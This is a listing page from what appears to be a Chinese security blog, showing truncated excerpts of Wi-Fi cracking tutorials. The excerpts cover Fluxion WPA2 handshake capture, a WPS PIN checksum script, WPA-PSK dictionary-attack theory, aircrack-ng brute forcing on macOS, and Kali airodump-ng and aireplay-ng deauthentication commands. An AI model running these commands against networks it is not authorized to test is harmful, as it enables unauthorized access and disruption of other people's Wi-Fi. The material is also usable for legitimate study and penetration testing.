Kali环境下使用Fluxion抓WPA2握手包
0x01 前言 一直记不起来有个抓wpa2握手包的集成工具叫啥,比Aircrack好用,想了很久终于想起来了,叫fluxion。所以做一下笔记免得下次忘记了。 但是Aircrack是kali自带的,fluxion需要自己装一下,不过安装过程也是比较简单。 项目地址:https://github.com/FluxionNetwork/fluxion 0x02 Fluxion安装 1.使用git clone命令或者自行下载fluxion包到kali下面 git clone https://www.github.com/FluxionNetwork/fluxion.git 2.进入fluxion目录 cd fluxion 3.安装fluxion 注意:首次可能需要./fuluxion.sh -i进行安装,这边推荐先把kali源改到国内这样安装包快一些。 ./fluxion.sh -i 4.检查网线网卡与kali机是否进行连接,使用命令iwconfig 0x03 fluxion抓握手包 1.检查 1.运行fluxion ./fluxion.sh 2.选择一个攻击方式,选[2],回车。 [2]Handshake Snoo...WPS PIN码最后一位校验位计算
""" PIN码结构: 前四位 中间三位 校验位 x x x x x x x x 单 双 单 双 单 双 单 PIN码最后一位校验算法: 单位:-x*3 双位:10-x 算:双位+ 单位- 最后运算结果取余的绝对值 """ pin = '7697000' # pin前七位 pinLast = abs((-(3 * int(pin[0])) + (10 - int(pin[1])) - (3 * int(pin[2])) + (10 - int(pin[3])) - (3 * int(pin[4])) + ( 10 - int(pin[5])) - (3 * int(pin[6]))) % 10) print(pinLast) # 校验位 print(pin+str(pinLast))WPA-PSK安全漏洞原理
WPA/WPA2简介 由于WEP中存在严重的安全漏洞,WIFI联盟制定了WPA和WPA2以取代WEP。其中WPA实现了802.11i的主要部分,提供了对现有硬件的向下兼容,被用来作为WEP到802.11i的过渡。之后的则WPA2完整的实现了整个IEEE 802.1i标准。 WPA的根据应用场景的不同采用不同的认证方式,其中面对家庭或小型办公场所网络的WPA-PSK不需要专门的认证服务器,所有该网络中的设备通过使用同一个256-bit的密钥来进行认证。 WPA-PSK安全漏洞 WPA-PSK认证中的四次握手被设计用来在不安全的信道中,通过明文传输的方式来进行一定程度上的认证,并且在设备之间建立安全信道。首先,PSK会被转化为PMK,而PMK则在接下来被用于生成PTK。PTK则会被分为若干部分,其中一部分被称作MIC Key,用来生成每一个包的Hash值来用于验证。 WPA的安全问题与其认证过程所使用的算法关系不大,更多的是由于这一过程可以被轻易的重现,这就使得WPA-PSK可能遭受字典暴力攻击。 WPA-PSK攻击原理 WPA-PSK攻击分为以下几个步骤: 1. 根据passphrase,SSID生成P...MacBook利用自带airport抓包cap包,并使用aircrack-ng暴破wifi密码
1.安装homebrew /bin/zsh -c "$(curl -fsSL https://gitee.com/cunkai/HomebrewCN/raw/master/Homebrew.sh)" 2.安装aircrack-ng brew install aircrack-ng 3.查看网卡设备名字 系统偏好设置->网络->Wi-Fi->高级->硬件->MAC地址 ifconfig 查找该MAC地址对应的网卡设备名 这边可以看到MAC地址对应的是en0 4.获取所有wifi信息 sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s 输出的就是附近所有的wifi, SSID为wifi名称, BSSID为wifi网卡MAC地址, CHANNEL为信道。 如果觉得上面命令太长,可以给airport设置一个软链接: 首先需解除rootless内核保护(内核保护会对\usr、\sbin禁止root权限,下面操作需用到\us...标签: 无线网络 aieport aircrack-ng
Kali Linux 破解wifi密码
0x01 扫描wifi airmon-ng start wlan0开启网卡监听模式 iwconfig命令查看网卡信息, 查看网卡名称有没有变,有些是wlan0有些是wlan0mon airodump-ng wlan0mon,开始扫描WiFi,按ctrl+c结束任务 BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码 0x02 抓数据包 接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon 如:airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/wifi wlan0mon 数据包已经正在抓取 如果抓取不到数据,新建一个终端:键入aireplay-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon) 如:aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:...搜索内容
热门文章
- DS918+,DS3617xs黑群晖洗白码
- VMware vCenter vSphere ESXi 7.0 许可证&下载链接
- 黑群晖各版本引导下载
- Kali Liunx下msfvenom利用方法
- python base64加解密脚本(可变换码表)
- Kali Liunx字典生成工具Crunch,Cupp,Cewl
- 解决VM虚拟机Kali Liunx连不上网
- JIS-CTF-VulnUpload-CTF01靶机渗透测试笔记
最新文章
- 解决 Prometheus Ingress 自动发现权限不足的 RBAC 配置
- K8S 使用Local Path Storage(本地路径存储)
- Alertmanager 企业微信告警配置 自定义告警模板
- Alertmanager 邮件告警配置
- K8S部署Elasticsearch集群(Elasticsearch Operator)[ECK]
- Prometheus blackbox-exporter自定义User-Agent
- Prometheus Blackbox(黑盒监控)
- K8S kube-prometheus监控etcd
最新评论
- ID:冬天里的火
可以,现在弄k8s 的越来越多了,确实都...
友情链接
日期存档
- 2024年11月(5)
- 2024年10月(8)
- 2024年9月(6)
- 2024年8月(2)
- 2024年7月(7)
- 2024年6月(1)
- 2024年5月(6)
- 2024年4月(1)
- 2024年3月(3)
- 2024年2月(6)
- 2024年1月(11)
- 2023年12月(13)
- 2023年11月(13)
- 2023年10月(8)
- 2023年9月(11)
- 2023年8月(4)
- 2023年7月(18)
- 2023年6月(16)
- 2023年5月(16)
- 2023年4月(4)
- 2023年3月(7)
- 2023年2月(26)
- 2023年1月(10)
- 2022年12月(7)
- 2022年11月(2)
- 2022年10月(5)
- 2022年9月(8)
- 2022年8月(9)
- 2022年7月(4)
- 2022年6月(3)
- 2022年5月(3)
- 2022年4月(3)
- 2022年3月(7)
- 2022年2月(1)
- 2022年1月(2)
- 2021年12月(6)
- 2021年11月(3)
- 2021年10月(5)
- 2021年9月(8)
- 2021年8月(3)
- 2021年7月(3)
- 2021年6月(3)
- 2021年5月(3)
- 2021年4月(4)
- 2021年3月(3)
- 2021年2月(1)
- 2021年1月(1)
- 2020年12月(8)
- 2020年11月(6)
- 2020年10月(1)
- 2020年9月(3)
- 2020年8月(1)
- 2020年7月(5)
- 2020年6月(1)
- 2020年5月(2)
- 2020年4月(7)
- 2020年3月(20)
- 2020年2月(12)
- 2020年1月(3)
- 2010年10月(3)